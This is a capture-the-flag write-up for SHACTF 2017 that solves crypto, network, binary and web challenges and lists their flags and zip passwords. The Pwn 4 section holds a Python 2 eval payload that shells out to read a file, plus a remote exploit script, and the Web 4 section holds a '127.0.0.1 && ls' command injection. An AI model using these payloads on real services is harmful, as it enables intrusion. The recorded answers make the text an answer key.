SHACTF 2017 Write up for MISC Junior (200)
Crypt 1: All about the base
V2VsbCBkb25lLAoKdGhpcyBmaWxlIGlzIGVuY3J5cHRlZCB3aXRoIEJhc2U2NC4gT2Z0ZW4gdXNl
ZCBpbiBDVEYncyB0byBkaXNwbGF5IGJpbmFyeSBkYXRhIGluIGEgbW9yZSBmcmllbmRseSB3YXku IAoKVGhlIGZsYWcgZm9yIHRoaXMgY2hhbGxlbmdlIGlzIGZsYWd7YjNlOWMzZWVlNjA5YmFjNDZm YWQ0NDM5Y2YzMjFmZTV9Cg==
Just base64-decode it. The plaintext is a short "Well done" note (which calls base64 "encryption"; it is only an encoding, used in CTFs to carry binary data as text) ending with the flag.
flag: flag{b3e9c3eee609bac46fad4439cf321fe5}
Crypt 1: Rotation
Seems someone rotated the alphabet, can you get the original message back?
Ykksy eua ckxk ghrk zu mkz znk zkdz hgiq. Znk lrgm oy lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}
Okay, this must be a Caesar cipher, right?
I took the part "lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}" because I know for sure that lrgm must be flag under some rotation: l->f, r->l, g->a, m->g is a shift of 6 backwards (ROT20), and applying it to the whole line gives "Seems you were able to get the text back. The flag is ...".
kt.pe is dead :v so I wrote a script to do the job :v
flag: flag{30d3a1aa0cda9f08cdfa52668bc6854a}
Crypt2: Substitute Teacher
Hello, my name is Mr. Smith, I will be your substitute teacher for today. I only have one assignment for you today, if you solve it you may go home. Now be silence and solve it, so I can Netflix and chill!
osvi cpm dprzsob ulsd hddsboeiou. iocpg gpaj njii usei. rihzi uli vrhdd tsulpau ehfsob h dpaow,
s'e so uli eswwri pn h oit iqsdpwi pn pjhobi sd uli oit mrhvf po oiunrsy. npj gpaj innpjud s lhzi
h nrhb npj gpa: nrhb{h230h7i624hnhv36291v5n31nh818w6n}
:v Throw it into quipqiup (automated substitution-cipher solver) and get the flag :v
flag: flag{a230a7e624afac36291c5f31fa818d6f}
Crypt 3: Exclusive or ... (2)
We found this strange text, can you get the original from it?
I was too lazy to do the frequency analysis to find the key; I just used xortool -b to brute-force it, because I know the key length is 1, so there are only 255 non-zero key bytes to try.
flag: flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}
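Both the Rotation and the Exclusive-or challenges come down to the same thing: a keyspace so small (26 shifts, 256 key bytes) that you try every key and keep the one whose output contains a crib such as "flag{". The script below is an added example, not the write-up's own script or xortool; the Caesar ciphertext is the one from the Rotation challenge, while the XOR ciphertext is constructed here by XORing the Exclusive-or flag with the key byte 0x37, since the challenge file is not on the page.

```python
"""Added example: brute-forcing a tiny keyspace with a known-plaintext crib.
Works for the Rotation challenge (26 shifts) and the single-byte XOR challenge
(256 keys) alike: try every key, keep the candidate containing the crib."""
import string

ALPHA = string.ascii_lowercase


def caesar_shift(text, k):
    """Shift every ASCII letter by k positions (mod 26); other characters pass through."""
    out = []
    for ch in text:
        if ch.islower():
            out.append(ALPHA[(ALPHA.index(ch) + k) % 26])
        elif ch.isupper():
            out.append(ALPHA[(ALPHA.index(ch.lower()) + k) % 26].upper())
        else:
            out.append(ch)
    return "".join(out)


def xor_single_byte(data, key):
    """XOR every byte of data with one key byte (encryption and decryption are identical)."""
    return bytes(b ^ key for b in data)


def brute_force(candidates, decrypt, crib):
    """Return (key, plaintext) for the first key whose decryption contains the crib."""
    for key in candidates:
        pt = decrypt(key)
        if crib in pt:
            return key, pt
    return None, None


def solve_caesar(ciphertext, crib="flag{"):
    # key k means "the author shifted forward by k", so we shift back by k
    return brute_force(range(26), lambda k: caesar_shift(ciphertext, -k), crib)


def solve_xor(ciphertext, crib=b"flag{"):
    # this is what xortool -b does for a key length of 1: all 256 key bytes
    return brute_force(range(256), lambda k: xor_single_byte(ciphertext, k), crib)


# ciphertext from the Rotation challenge
ROTATION_CT = ("Ykksy eua ckxk ghrk zu mkz znk zkdz hgiq. "
               "Znk lrgm oy lrgm{30j3g1gg0ijg9l08ijlg52668hi6854g}")
# constructed sample: the Exclusive-or flag XORed with key byte 0x37
XOR_CT = xor_single_byte(b"The flag is flag{a157d2b4eb73c60ff0cdbe2a2dea06c3}", 0x37)

if __name__ == "__main__":
    print(solve_caesar(ROTATION_CT))
    print(solve_xor(XOR_CT))
```

The crib check is what makes a blind brute force usable: without it you would be reading 26 or 256 candidates by eye, which is exactly the "check the frequency" work the write-up skipped.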
Crypt 3: Tranposition Cipher
We intercepted this secret message. We believe it is using a transposition cipher. Can you decipher it?
Citgoe6b0 oohern636 nni.tg1e2 gssThe58e rschii366
aohess3ae tlafcf3dc uvllhl24f lilaaa730 aneglg506 tgnfl{33}
Read the first letter of every word and you can see "c o n g r a t u l a t", right? The message was written column by column into 9-character groups, so reading the groups column by column gives it back.
I wrote a script to do the job.
flag: flag{66153332753b3e86ad4303062e6ecf06}
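Undoing the transposition, as an added example (not the write-up's script): each whitespace-separated group is one row of a grid, and reading the grid column by column restores the message. The ciphertext is the one from the challenge.

```python
"""Added example: reading a columnar transposition back out.
Each space-separated group is a row; the plaintext is the grid read column by column."""

# ciphertext from the Transposition Cipher challenge
CIPHERTEXT = ("Citgoe6b0 oohern636 nni.tg1e2 gssThe58e rschii366 "
              "aohess3ae tlafcf3dc uvllhl24f lilaaa730 aneglg506 tgnfl{33}")


def read_by_columns(ciphertext):
    """Treat each group as a row and read the grid column by column.

    Rows may be ragged in general, so missing cells are skipped rather than
    raising an IndexError."""
    rows = ciphertext.split()
    width = max(len(r) for r in rows)
    return "".join(row[col] for col in range(width) for row in rows if col < len(row))


def extract_flag(text):
    """Pull the first flag{...} out of the recovered text."""
    start = text.index("flag{")
    end = text.index("}", start) + 1
    return text[start:end]


if __name__ == "__main__":
    plain = read_by_columns(CIPHERTEXT)
    print(plain)
    print(extract_flag(plain))
```

If the first letters of the groups had not spelled anything, the next things to try are the other standard readings: columns in a keyed order, or rows of a different width.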
Misc 1 + Misc 2 :
We received this zip file, but is asking for a password. All we know is that the password exists of 5 numbers, can you crack this password to get the hidden information?
We received another zip file, which also requires a password. All we know is that the password is an existing English word with a length of 6 and all lowercase. Can you crack this password?
fcrackzip, John the Ripper, or an online cracker can do this job, because the password spaces are tiny: 5 digits is only 100,000 candidates, and a 6-letter lowercase English word is a dictionary attack.
pass 1 : 42831
pass 2: future
Misc3 : reverse
We found this file on a server on the other side of the world, it looks weird, can you "reverse" it?
After checking the header in a hex editor we can see it clearly:
e474 9805 -> 89 50 4e 47 -> the PNG signature, backwards.
Okay, so the file has just been reversed, right?
I wrote a script to put the bytes back in their original positions.
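A repair script, as an added example (not the write-up's own): the write-up only says the PNG signature shows up reversed, so this tries the two things "reversed" usually means, byte order and hex-digit (nibble) order, and keeps whichever candidate starts with a known file signature. The sample PNG is constructed in the script; the challenge file is not on the page.

```python
"""Added example: un-reversing a file and checking the result against known magic bytes."""
import struct
import zlib

# a few common signatures; add more if the reversed file is something else
SIGNATURES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "zip": b"PK\x03\x04",
    "pdf": b"%PDF-",
}


def identify(data):
    """Return the file type whose magic bytes data starts with, or None."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return None


def candidates(data):
    """Yield (description, bytes) for the plausible undoings of a reversal."""
    yield "as-is", data
    yield "bytes reversed", data[::-1]
    # reverse the hex dump character by character (nibble-level reversal)
    yield "nibbles reversed", bytes.fromhex(data.hex()[::-1])


def recover(data):
    """Return (how, fixed_bytes, kind) for the first candidate with a known signature."""
    for how, cand in candidates(data):
        kind = identify(cand)
        if kind:
            return how, cand, kind
    return None, data, None


def make_png_chunk(tag, body):
    """One PNG chunk: big-endian length, tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def sample_png():
    """Constructed sample input: a minimal 1x1 greyscale PNG."""
    ihdr = make_png_chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0))
    idat = make_png_chunk(b"IDAT", zlib.compress(b"\x00\x80"))  # filter byte + one pixel
    iend = make_png_chunk(b"IEND", b"")
    return SIGNATURES["png"] + ihdr + idat + iend


if __name__ == "__main__":
    png = sample_png()
    for broken in (png[::-1], bytes.fromhex(png.hex()[::-1])):
        how, fixed, kind = recover(broken)
        print(how, kind, fixed == png)
```

Checking the magic after the transformation is the part worth keeping: it turns "I think it is reversed" into a test, and the same loop extends to other scramblings (byte-swapped words, a constant XOR) by adding a candidate.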
Network 1 : Download
We have a network capture of someone downloading something from the internet. Can you find what it is?
After looking at the capture, we can see that someone requested flag.jpg over HTTP/1.1 and the server answered with the file, so we can recover the download itself with Wireshark's File > Export Objects > HTTP.
Export the file and you get the flag.
Network 2: WannaBuyAFlag
Analyse this Network capture to get the flag.
It is just a conversation, so we can use Follow TCP Stream to see what they are doing :v
and get the flag.
Network 3: Weird Website
We captured some traffic while visiting this website. Can you get some information from it?
:v Export the HTTP objects to get the HTML,
then look inside the HTML: surprise!
Network 4: Captured Mail
We intercepted this mail message. Can you open the attachment?
Wow, it is SMTP, so just follow the TCP stream to see the conversation.
Someone sends a flag file as an attachment, but it is base64-encoded (encoded, not encrypted), so we just decode it and get the flag.
I wrote a script to do the job.
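Pulling the attachment out of the captured session, as an added example (not the write-up's script): the client's DATA section, everything between the server's 354 reply and the lone "." terminator, is an ordinary RFC 5322 message, so the standard library's email parser can walk the MIME parts and undo the base64 transfer encoding. The SMTP session below is constructed for the demo; the challenge capture is not on the page.

```python
"""Added example: extracting a base64 attachment from a captured SMTP session."""
import base64
import email
from email import policy


def build_capture(secret):
    """Constructed sample session (not the challenge capture) carrying `secret` as an attachment."""
    lines = [
        "220 mail.example.test ESMTP",
        "EHLO client.example.test",
        "250 mail.example.test",
        "MAIL FROM:<alice@example.test>",
        "250 OK",
        "RCPT TO:<bob@example.test>",
        "250 OK",
        "DATA",
        "354 End data with <CR><LF>.<CR><LF>",
        "From: alice@example.test",
        "To: bob@example.test",
        "Subject: the file you asked for",
        "MIME-Version: 1.0",
        'Content-Type: multipart/mixed; boundary="XYZ"',
        "",
        "--XYZ",
        "Content-Type: text/plain",
        "",
        "Attached.",
        "--XYZ",
        'Content-Type: application/octet-stream; name="flag.txt"',
        "Content-Transfer-Encoding: base64",
        'Content-Disposition: attachment; filename="flag.txt"',
        "",
        base64.b64encode(secret).decode(),
        "--XYZ--",
        ".",
        "250 OK: queued",
        "QUIT",
        "221 Bye",
    ]
    return "\r\n".join(lines) + "\r\n"


def extract_data_section(session):
    """Return the raw message the client sent between the 354 reply and the '.' terminator."""
    lines = session.split("\r\n")
    start = next(i for i, line in enumerate(lines) if line.startswith("354")) + 1
    end = lines.index(".", start)
    # RFC 5321 dot-stuffing: a line that began with '.' was sent as '..'
    body = [line[1:] if line.startswith("..") else line for line in lines[start:end]]
    return "\r\n".join(body) + "\r\n"


def extract_attachments(session):
    """Parse the DATA section as MIME and return {filename: decoded bytes}."""
    msg = email.message_from_string(extract_data_section(session), policy=policy.default)
    found = {}
    for part in msg.walk():
        if part.get_content_disposition() == "attachment":
            # decode=True undoes the Content-Transfer-Encoding (base64 here)
            found[part.get_filename()] = part.get_payload(decode=True)
    return found


if __name__ == "__main__":
    sample = build_capture(b"flag{constructed_sample_flag}\n")
    for name, content in extract_attachments(sample).items():
        print(name, content)
```

Letting the email parser do the decoding rather than grepping for a base64 blob also handles the cases a hand-rolled decoder trips over: quoted-printable parts, nested multipart bodies, and line-wrapped base64.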
Forensic 3: Deleted file
I accidently deleted a file from my system. Can you get it back for me?
foremost ?
Pwn 4: small
This program consists of only 4 words, and still they've made a mistake. Read the flag from /home/small/flag
nc small.stillhackinganyway.nl 1337
So we should read the flag from /home/small/flag, right?
We just netcat to the server and cat the flag.
There is a bug in the input function that allows us to execute any command we like: the program is Python 2, whose input() evaluates whatever you type as a Python expression.
I used __builtins__.__import__('os').system('cat /home/small/flag')
or we could write a script to do it :v
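The script version, as an added example (not the write-up's): Python 2's input() is literally eval(raw_input()), so simulate_py2_input() reproduces that behaviour locally to test a payload offline, and exploit_remote() sends the same payload to a live service. The demo reads the file with open() instead of the write-up's os.system('cat ...') so that the value comes back from eval() rather than being printed by a child process; host and port are placeholders.

```python
"""Added example: exploiting Python 2's input() (== eval(raw_input()))."""
import os
import socket
import tempfile


def build_payload(path):
    """An expression that reads a file when eval()'d on the target; no shell needed."""
    return "open(%r).read()" % path


def simulate_py2_input(line):
    """The vulnerable behaviour: Python 2's input() evaluates the line as an expression."""
    return eval(line)


def demo_local():
    """Create a fake flag file and show the payload reading it through eval()."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as f:
        f.write("flag{constructed_for_demo}\n")  # constructed sample flag
    try:
        return simulate_py2_input(build_payload(path))
    finally:
        os.unlink(path)


def exploit_remote(host, port, path="/home/small/flag", timeout=5):
    """Send the payload to the service and return whatever it prints back.

    host/port are placeholders: e.g. exploit_remote("small.stillhackinganyway.nl", 1337)."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall((build_payload(path) + "\n").encode())
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode(errors="replace")


if __name__ == "__main__":
    print(demo_local())
```

The fix on the defender's side is the obvious one: raw_input() in Python 2 (or input() in Python 3, which no longer evaluates), and never eval() on untrusted text.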
Binary 1 : Find The Flag
There is a flag hidden in this binary. Can you find it?
:v Just run strings on it.
Binary 3: Hidden Message
This file contains a hidden message. Can you reverse engineer it and find it?
It is an .apk, so I used an online decompiler (JADX) to get the source.
Then we analyse the resulting files.
Instead of checking every file, I used grep:
grep -rnw ~/Desktop/CTF/output/jpg/hidden-message_source_from_JADX -e flag
And we get the flag: flag{d3314ac1a08d65ea32ffd30907de2409}
binary 4: Jump Around
Jump up, jump up and get down!
I used IDA to analyse JumpAround and found that the flag is just a calculation, so I wrote a script to calculate v1.
binary 4: Flip a coin
We can not seem to win this game that we found, can you?
My idea: every time we win, the win counter only increases by 1, so why not make it increase by 100?
I looked for the ADD instruction in OllyDbg; it is at 0x401668.
Now we just patch the 1 (0x1) to 100 (0x64), run the program, and get the flag.
Web1 : In your head
Sometimes you have just to listen to your head.
-> The flag must be in the HTTP response headers.
Web 2 : Broken image
Seems we have a broken image on our website.
We can see that the broken image contains base64 data;
just decode the base64 and we get the flag.
Web 2: Old school
We found this Old School Website.
It requires IE6 to connect, so we just change the User-Agent header to one containing MSIE 6.0.
Web 3: Location
Like in real estate, the web is all about location, location and location.
Just hit the "try again" button and watch the browser's network tab: the flag shows up in the traffic.
Web 4: Ping
We created a simple ping service.
I didn't know what to ping, so I tried 127.0.0.1 && ls; the input goes straight into a shell command, so this executes ls on the web server, and we can see the file s3cr3tfl4g.txt.
Read it the same way and we get the flag.
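What the Ping service got wrong, next to a fixed version, as an added example (we never saw the challenge's source, so the vulnerable function is a reconstruction of the behaviour the write-up observed, not the real code): splicing user input into a shell command line lets "127.0.0.1 && ls" run ls, while validating the target and passing an argv list to the OS with no shell in between closes the hole.

```python
"""Added example: command injection in a ping service, vulnerable and fixed."""
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def vulnerable_ping_cmd(target):
    """Reconstruction of the bug: the target is pasted into a line run by a shell,
    so '&&', ';' and '|' in the input are interpreted by /bin/sh."""
    return "ping -c 1 " + target  # executed as subprocess.run(cmd, shell=True)


def validate_target(target):
    """Accept an IP literal or a syntactically valid hostname; reject everything else."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if HOSTNAME_RE.match(target):
        return target
    raise ValueError("invalid ping target: %r" % target)


def is_safe_target(target):
    """True if validate_target() would accept the input."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def safe_ping_argv(target):
    """argv list: the OS exec()s ping directly, so no shell ever parses the target."""
    return ["ping", "-c", "1", validate_target(target)]


def run_safe_ping(target):
    """Run the hardened version and return ping's output (ping must be installed)."""
    proc = subprocess.run(safe_ping_argv(target), capture_output=True, text=True, timeout=10)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    print(vulnerable_ping_cmd("127.0.0.1 && ls"))  # the injected line the shell would run
    print(safe_ping_argv("127.0.0.1"))
    print(is_safe_target("127.0.0.1 && ls"))
```

Both halves of the fix matter: the argv list stops the shell from interpreting metacharacters, and the validation stops a target like "-f" or "--option" from being parsed as a flag by ping itself.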
And this is the flag for MISC Junior ( 200 )
kt.pe is now kt.gy
oh thanks dude, I thought it was dead hehe